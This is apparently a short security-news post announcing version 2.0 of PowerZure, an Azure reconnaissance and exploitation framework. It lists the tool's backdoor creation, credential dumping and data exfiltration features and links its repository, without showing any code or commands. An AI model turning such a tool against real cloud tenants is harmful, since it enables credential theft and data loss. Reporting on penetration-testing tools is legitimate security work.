PowerZure, exploit framework targeting Azure, has been updated

PowerZure is a framework designed to perform reconnaissance and exploitation of the Azure cloud platform, Azure Active Directory, and associated resources.

The project [1] is maintained by Ryan Hausknecht, who recently released a new version (2.0) of the framework. The tool is now equipped with the following attack components and its functions:

  • Operational functions with backdoor/payload creation and execution
  • Information gathering on users, groups, applications, and resources
  • Credential dumping of key vault secrets, applications, certificates, and automation accounts
  • Data exfiltration of storage accounts, account keys, runbooks, storage containers, file shares, and virtual machine disk contents


  1. https://github.com/hausec/PowerZure

Related posts

  1. Practical approach to Golden Ticket Attacks: one technique, five useful tools
  2. Windows Service Accounts enumeration using Powershell
  3. BlackDirect: a vulnerability in Microsoft OAuth 2.0 may allows attackers to takeover Microsoft and Azure Accounts
  4. Also Node.js has been used to perform a Living off the Land (LotL) attack
  5. Windows information gathering using Powershell: a brief cheatsheet